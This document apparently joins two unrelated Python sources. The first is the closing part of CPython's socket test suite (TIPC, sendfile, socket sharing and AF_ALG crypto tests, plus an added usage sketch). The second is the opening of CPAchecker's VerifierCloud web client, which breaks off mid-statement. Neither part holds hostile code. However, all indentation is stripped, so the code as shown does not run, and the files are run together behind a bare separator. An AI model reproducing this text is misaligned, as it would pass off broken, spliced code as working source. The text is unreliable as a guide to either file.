self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
def testRecvFromIntoSmallBuffer(self):
# See issue #20246.
buf = bytearray(8)
self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)
def _testRecvFromIntoSmallBuffer(self):
self.serv_conn.send(MSG)
def testRecvFromIntoEmptyBuffer(self):
buf = bytearray()
self.cli_conn.recvfrom_into(buf)
self.cli_conn.recvfrom_into(buf, 0)
_testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
try:
f = open("/proc/modules")
except (FileNotFoundError, IsADirectoryError, PermissionError):
# It's OK if the file does not exist, is a directory, or if we
# don't have permission to read it.
return False
with f:
for line in f:
if line.startswith("tipc "):
return True
return False
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName = 'runTest'):
unittest.TestCase.__init__(self, methodName = methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
# There is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(OSError, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertTrue(s.type & socket.SOCK_CLOEXEC)
self.assertFalse(s.get_inheritable())
def test_default_inheritable(self):
sock = socket.socket()
with sock:
self.assertEqual(sock.get_inheritable(), False)
def test_dup(self):
sock = socket.socket()
with sock:
newsock = sock.dup()
sock.close()
with newsock:
self.assertEqual(newsock.get_inheritable(), False)
def test_set_inheritable(self):
sock = socket.socket()
with sock:
sock.set_inheritable(True)
self.assertEqual(sock.get_inheritable(), True)
sock.set_inheritable(False)
self.assertEqual(sock.get_inheritable(), False)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_get_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(sock.get_inheritable(), False)
# clear FD_CLOEXEC flag
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
self.assertEqual(sock.get_inheritable(), True)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_set_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
fcntl.FD_CLOEXEC)
sock.set_inheritable(True)
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
0)
@unittest.skipUnless(hasattr(socket, "socketpair"),
"need socket.socketpair()")
def test_socketpair(self):
s1, s2 = socket.socketpair()
self.addCleanup(s1.close)
self.addCleanup(s2.close)
self.assertEqual(s1.get_inheritable(), False)
self.assertEqual(s2.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertTrue(s.type & socket.SOCK_NONBLOCK)
self.assertEqual(s.gettimeout(), timeout)
else:
self.assertFalse(s.type & socket.SOCK_NONBLOCK)
self.assertEqual(s.gettimeout(), None)
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(1)
self.checkNonblock(s, False)
s.setblocking(0)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(1)
self.checkNonblock(s, False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
# This must be classmethod and not staticmethod or multiprocessing
# won't be able to bootstrap it.
@classmethod
def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
# and service it from there.
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
# listen for the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
# Socket sharing is expected to work only for blocking sockets,
# since the internal Python timeout value isn't transferred.
self.assertEqual(org.gettimeout(), None)
self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
self.assertEqual(org.type, other.type)
# If the user specified "0" for proto, then
# internally windows will have picked the correct value.
# Python introspection on the socket however will still return
# 0. For the shared socket, the python value is recreated
# from the actual value, so it may not compare correctly.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
shared = socket.fromshare(data)
try:
self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
class SendfileUsingSendTest(ThreadedTCPSocketTest):
"""
Test the send() implementation of socket.sendfile().
"""
FILESIZE = (10 * 1024 * 1024) # 10MB
BUFSIZE = 8192
FILEDATA = b""
TIMEOUT = 2
@classmethod
def setUpClass(cls):
def chunks(total, step):
assert total >= step
while total > step:
yield step
total -= step
if total:
yield total
chunk = b"".join([random.choice(string.ascii_letters).encode()
for i in range(cls.BUFSIZE)])
with open(support.TESTFN, 'wb') as f:
for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
f.write(chunk)
with open(support.TESTFN, 'rb') as f:
cls.FILEDATA = f.read()
assert len(cls.FILEDATA) == cls.FILESIZE
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
def accept_conn(self):
self.serv.settimeout(self.TIMEOUT)
conn, addr = self.serv.accept()
conn.settimeout(self.TIMEOUT)
self.addCleanup(conn.close)
return conn
def recv_data(self, conn):
received = []
while True:
chunk = conn.recv(self.BUFSIZE)
if not chunk:
break
received.append(chunk)
return b''.join(received)
def meth_from_sock(self, sock):
# Depending on the mixin class being run, return either the send()
# or the sendfile() method implementation.
return getattr(sock, "_sendfile_use_send")
# regular file
def _testRegularFile(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
def testRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# non regular file
def _testNonRegularFile(self):
address = self.serv.getsockname()
file = io.BytesIO(self.FILEDATA)
with socket.create_connection(address) as sock, file as file:
sent = sock.sendfile(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
self.assertRaises(socket._GiveupOnSendfile,
sock._sendfile_use_sendfile, file)
def testNonRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# empty file
def _testEmptyFileSend(self):
address = self.serv.getsockname()
filename = support.TESTFN + "2"
with open(filename, 'wb'):
self.addCleanup(support.unlink, filename)
file = open(filename, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, 0)
self.assertEqual(file.tell(), 0)
def testEmptyFileSend(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(data, b"")
# offset
def _testOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file, offset=5000)
self.assertEqual(sent, self.FILESIZE - 5000)
self.assertEqual(file.tell(), self.FILESIZE)
def testOffset(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE - 5000)
self.assertEqual(data, self.FILEDATA[5000:])
# count
def _testCount(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 5000007
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCount(self):
count = 5000007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count small
def _testCountSmall(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 1
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCountSmall(self):
count = 1
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count + offset
def _testCountWithOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 100007
meth = self.meth_from_sock(sock)
sent = meth(file, offset=2007, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count + 2007)
def testCountWithOffset(self):
count = 100007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[2007:count+2007])
# non blocking sockets are not supposed to work
def _testNonBlocking(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
sock.setblocking(False)
meth = self.meth_from_sock(sock)
self.assertRaises(ValueError, meth, file)
self.assertRaises(ValueError, sock.sendfile, file)
def testNonBlocking(self):
conn = self.accept_conn()
if conn.recv(8192):
self.fail('was not supposed to receive any data')
# timeout (non-triggered)
def _testWithTimeout(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
def testWithTimeout(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# timeout (triggered)
def _testWithTimeoutTriggeredSend(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=0.01) as sock, \
file as file:
meth = self.meth_from_sock(sock)
self.assertRaises(socket.timeout, meth, file)
def testWithTimeoutTriggeredSend(self):
conn = self.accept_conn()
conn.recv(88192)
# errors
def _test_errors(self):
pass
def test_errors(self):
with open(support.TESTFN, 'rb') as file:
with socket.socket(type=socket.SOCK_DGRAM) as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "SOCK_STREAM", meth, file)
with open(support.TESTFN, 'rt') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "binary mode", meth, file)
with open(support.TESTFN, 'rb') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count='2')
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count=0.1)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=0)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=-1)
@unittest.skipUnless(hasattr(os, "sendfile"),
'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
"""
Test the sendfile() implementation of socket.sendfile().
"""
def meth_from_sock(self, sock):
return getattr(sock, "_sendfile_use_sendfile")
@unittest.skipUnless(HAVE_SOCKET_ALG, 'AF_ALG required')
class LinuxKernelCryptoAPI(unittest.TestCase):
# tests for AF_ALG
def create_alg(self, typ, name):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
try:
sock.bind((typ, name))
except FileNotFoundError as e:
# type / algorithm is not available
sock.close()
raise unittest.SkipTest(str(e), typ, name)
else:
return sock
def test_sha256(self):
expected = bytes.fromhex("ba7816bf8f01cfea414140de5dae2223b00361a396"
"177a9cb410ff61f20015ad")
with self.create_alg('hash', 'sha256') as algo:
op, _ = algo.accept()
with op:
op.sendall(b"abc")
self.assertEqual(op.recv(512), expected)
op, _ = algo.accept()
with op:
op.send(b'a', socket.MSG_MORE)
op.send(b'b', socket.MSG_MORE)
op.send(b'c', socket.MSG_MORE)
op.send(b'')
self.assertEqual(op.recv(512), expected)
def test_hmac_sha1(self):
expected = bytes.fromhex("effcdf6ae5eb2fa2d27416d5f184df9c259a7c79")
with self.create_alg('hash', 'hmac(sha1)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, b"Jefe")
op, _ = algo.accept()
with op:
op.sendall(b"what do ya want for nothing?")
self.assertEqual(op.recv(512), expected)
# Although it should work with 3.19 and newer the test blocks on
# Ubuntu 15.10 with Kernel 4.2.0-19.
@support.requires_linux_version(4, 3)
def test_aes_cbc(self):
key = bytes.fromhex('06a9214036b8a15b512e03d534120006')
iv = bytes.fromhex('3dafba429d9eb430b422da802c9fac41')
msg = b"Single block msg"
ciphertext = bytes.fromhex('e353779c1079aeb82708942dbe77181a')
msglen = len(msg)
with self.create_alg('skcipher', 'cbc(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
flags=socket.MSG_MORE)
op.sendall(msg)
self.assertEqual(op.recv(msglen), ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([ciphertext],
op=socket.ALG_OP_DECRYPT, iv=iv)
self.assertEqual(op.recv(msglen), msg)
# long message
multiplier = 1024
longmsg = [msg] * multiplier
op, _ = algo.accept()
with op:
op.sendmsg_afalg(longmsg,
op=socket.ALG_OP_ENCRYPT, iv=iv)
enc = op.recv(msglen * multiplier)
self.assertEqual(len(enc), msglen * multiplier)
self.assertEqual(enc[:msglen], ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([enc],
op=socket.ALG_OP_DECRYPT, iv=iv)
dec = op.recv(msglen * multiplier)
self.assertEqual(len(dec), msglen * multiplier)
self.assertEqual(dec, msg * multiplier)
@support.requires_linux_version(4, 9) # see issue29324
def test_aead_aes_gcm(self):
key = bytes.fromhex('c939cc13397c1d37de6ae0e1cb7c423c')
iv = bytes.fromhex('b3d8cc017cbb89b39e0f67e2')
plain = bytes.fromhex('c3b3c41f113a31b73d9a5cd432103069')
assoc = bytes.fromhex('24825602bd12a984e0092d3e448eda5f')
expected_ct = bytes.fromhex('93fe7d9e9bfd10348a5606e5cafa7354')
expected_tag = bytes.fromhex('0032a1dc85f1c9786925a2e71d8272dd')
taglen = len(expected_tag)
assoclen = len(assoc)
with self.create_alg('aead', 'gcm(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE,
None, taglen)
# send assoc, plain and tag buffer in separate steps
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen, flags=socket.MSG_MORE)
op.sendall(assoc, socket.MSG_MORE)
op.sendall(plain)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# now with msg
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg_afalg([msg], op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# create anc data manually
pack_uint32 = struct.Struct('I').pack
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg(
[msg],
([socket.SOL_ALG, socket.ALG_SET_OP, pack_uint32(socket.ALG_OP_ENCRYPT)],
[socket.SOL_ALG, socket.ALG_SET_IV, pack_uint32(len(iv)) + iv],
[socket.SOL_ALG, socket.ALG_SET_AEAD_ASSOCLEN, pack_uint32(assoclen)],
)
)
res = op.recv(len(msg) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# decrypt and verify
op, _ = algo.accept()
with op:
msg = assoc + expected_ct + expected_tag
op.sendmsg_afalg([msg], op=socket.ALG_OP_DECRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(len(msg) - taglen)
self.assertEqual(plain, res[assoclen:])
@support.requires_linux_version(4, 3) # see test_aes_cbc
def test_drbg_pr_sha256(self):
# deterministic random bit generator, prediction resistance, sha256
with self.create_alg('rng', 'drbg_pr_sha256') as algo:
extra_seed = os.urandom(32)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, extra_seed)
op, _ = algo.accept()
with op:
rn = op.recv(32)
self.assertEqual(len(rn), 32)
def test_sendmsg_afalg_args(self):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
with sock:
with self.assertRaises(TypeError):
sock.sendmsg_afalg()
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(1)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=-1)
def test_main():
tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest, UDPTimeoutTest ]
tests.extend([
NonBlockingTCPTests,
FileObjectClassTestCase,
UnbufferedFileObjectClassTestCase,
LineBufferedFileObjectClassTestCase,
SmallBufferedFileObjectClassTestCase,
UnicodeReadFileObjectClassTestCase,
UnicodeWriteFileObjectClassTestCase,
UnicodeReadWriteFileObjectClassTestCase,
NetworkConnectionNoServer,
NetworkConnectionAttributesTest,
NetworkConnectionBehaviourTest,
ContextManagersTest,
InheritanceTest,
NonblockConstantTest
])
tests.append(BasicSocketPairTest)
tests.append(TestUnixDomain)
tests.append(TestLinuxAbstractNamespace)
tests.extend([TIPCTest, TIPCThreadableTest])
tests.extend([BasicCANTest, CANTest])
tests.extend([BasicRDSTest, RDSTest])
tests.append(LinuxKernelCryptoAPI)
tests.extend([
BasicVSOCKTest,
ThreadedVSOCKSocketStreamTest,
])
tests.extend([
CmsgMacroTests,
SendmsgUDPTest,
RecvmsgUDPTest,
RecvmsgIntoUDPTest,
SendmsgUDP6Test,
RecvmsgUDP6Test,
RecvmsgRFC3542AncillaryUDP6Test,
RecvmsgIntoRFC3542AncillaryUDP6Test,
RecvmsgIntoUDP6Test,
SendmsgTCPTest,
RecvmsgTCPTest,
RecvmsgIntoTCPTest,
SendmsgSCTPStreamTest,
RecvmsgSCTPStreamTest,
RecvmsgIntoSCTPStreamTest,
SendmsgUnixStreamTest,
RecvmsgUnixStreamTest,
RecvmsgIntoUnixStreamTest,
RecvmsgSCMRightsStreamTest,
RecvmsgIntoSCMRightsStreamTest,
# These are slow when setitimer() is not available
InterruptedRecvTimeoutTest,
InterruptedSendTimeoutTest,
TestSocketSharing,
SendfileUsingSendTest,
SendfileUsingSendfileTest,
])
thread_info = support.threading_setup()
support.run_unittest(*tests)
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
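# Minimal usage sketch (added for illustration; the helper name and the use of
# an OS-chosen port are assumptions): the socket context-manager behaviour that
# ContextManagersTest above exercises, shown as a throwaway loopback echo
# exchange.  The _closed check mirrors the one used in those tests.
def _context_manager_sketch():
    import socket
    with socket.socket() as srv:
        srv.bind(("127.0.0.1", 0))      # let the OS pick a free port
        srv.listen()
        addr = srv.getsockname()
        with socket.create_connection(addr) as cli:
            conn, _ = srv.accept()
            with conn:
                cli.sendall(b"ping")
                conn.sendall(conn.recv(1024))    # echo the data back
                assert cli.recv(1024) == b"ping"
        assert cli._closed              # closed automatically on leaving the with-block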
|
webclient.py
|
"""
CPAchecker is a tool for configurable software verification.
This file is part of CPAchecker.
Copyright (C) 2007-2014 Dirk Beyer
All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
CPAchecker web page:
http://cpachecker.sosy-lab.org
"""
# prepare for Python 3
from __future__ import absolute_import, division, print_function, unicode_literals
import sys
sys.dont_write_bytecode = True # prevent creation of .pyc files
import base64
import fnmatch
import hashlib
import io
import logging
import os
import platform
import random
import tempfile
import threading
import zipfile
import zlib
from time import sleep
from time import time
import urllib.parse as urllib
import urllib.request as urllib2
from http.client import HTTPConnection
from http.client import HTTPSConnection
from concurrent.futures import ThreadPoolExecutor
from concurrent.futures import as_completed
from concurrent.futures import Future
try:
import sseclient # @UnresolvedImport
from requests import HTTPError
except:
pass
"""
This module provides helpers for accessing the web interface of the VerifierCloud.
"""
__all__ = [
'WebClientError', 'WebInterface', 'handle_result',
'MEMLIMIT', 'TIMELIMIT', 'SOFTTIMELIMIT', 'CORELIMIT',
'RESULT_FILE_LOG', 'RESULT_FILE_STDERR', 'RESULT_FILE_RUN_INFO', 'RESULT_FILE_HOST_INFO', 'RESULT_FILE_RUN_DESCRIPTION', 'SPECIAL_RESULT_FILES',
]
MEMLIMIT = 'memlimit'
TIMELIMIT = 'timelimit'
SOFTTIMELIMIT = 'softtimelimit'
CORELIMIT = 'corelimit'
RESULT_FILE_LOG = 'output.log'
RESULT_FILE_STDERR = 'stderr'
RESULT_FILE_RUN_INFO = 'runInformation.txt'
RESULT_FILE_HOST_INFO = 'hostInformation.txt'
RESULT_FILE_RUN_DESCRIPTION = 'runDescription.txt'
SPECIAL_RESULT_FILES = {RESULT_FILE_LOG, RESULT_FILE_STDERR, RESULT_FILE_RUN_INFO,
RESULT_FILE_HOST_INFO, RESULT_FILE_RUN_DESCRIPTION}
MAX_SUBMISSION_THREADS = 5
CONNECTION_TIMEOUT = 600 # seconds
HASH_CODE_CACHE_PATH = os.path.join(os.path.expanduser("~"), ".verifiercloud/cache/hashCodeCache")
class WebClientError(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class AutoCloseHTTPConnection(HTTPConnection):
def __del__(self):
self.close()
logging.debug("Closed connection")
class AutoCloseHTTPSConnection(HTTPSConnection):
def __del__(self):
self.close()
logging.debug("Closed connection")
class PollingResultDownloader:
def __init__(self, web_interface, result_poll_interval, unfinished_runs={}):
self._unfinished_runs = set()
self._unfinished_runs_lock = threading.Lock()
self._web_interface = web_interface
self._result_poll_interval = result_poll_interval
self._state_poll_executor = ThreadPoolExecutor(max_workers=web_interface.thread_count)
self._state_poll_thread = threading.Thread(target=self._poll_run_states, name='web_interface_state_poll_thread')
self._shutdown = threading.Event()
def _poll_run_states(self):
# in every iteration the states of all unfinished runs are requested once
while not self._shutdown.is_set():
start = time()
states = {}
with self._web_interface._unfinished_runs_lock:
for run_id in self._web_interface._unfinished_runs.keys():
state_future = self._state_poll_executor.submit(self._web_interface._is_finished, run_id)
states[state_future] = run_id
# Collect states of runs
for state_future in as_completed(states.keys()):
run_id = states[state_future]
state = state_future.result()
if state == "FINISHED" or state == "UNKNOWN":
self._web_interface._download_result_async(run_id)
elif state == "ERROR":
self._web_interface._run_failed(run_id)
end = time()
duration = end - start
if duration < self._result_poll_interval and not self._shutdown.is_set():
self._shutdown.wait(self._result_poll_interval - duration)
def start(self):
if (not self._shutdown.is_set()) and (not self._state_poll_thread.is_alive()):
logging.info("Starting polling of run states.")
self._state_poll_thread.start()
def shutdown(self):
self._shutdown.set()
if self._state_poll_thread.is_alive():
self._state_poll_thread.join()
self._state_poll_executor.shutdown(wait=True)
try:
class ShouldReconnectSeeClient(sseclient.SSEClient):
def __init__(self, url, should_reconnect, last_id=None, retry=3000, session=None, **kwargs):
super().__init__(url, last_id, retry, session, **kwargs)
self._should_reconnect = should_reconnect
def _connect(self):
(_, value, _) = sys.exc_info()
if (value is None or self._should_reconnect(value)):
super()._connect()
else:
raise StopIteration()
def __del__(self):
if hasattr(self, 'resp'):
self.resp.close()
class SseResultDownloader:
def __init__(self, web_interface, web_interface_url, result_poll_interval):
logging.debug("Server-Send Events are used to get state of runs.")
self._web_interface = web_interface
self._run_finished_url = web_interface_url + "runs/finished"
self._result_poll_interval = result_poll_interval
self._sse_client = None
self._shutdown = False
self._new_runs = False
self._state_receive_executor = ThreadPoolExecutor(max_workers=1)
def _log_future_exception_and_fallback(self, result):
if result.exception() is not None:
logging.warning('Error during result processing.', exc_info=True)
self._fall_back()
def _should_reconnect(self, error):
if self._new_runs:
return False
elif type(error) == HTTPError and error.response is not None \
and error.response.status >= 400 and error.response.status < 500 :
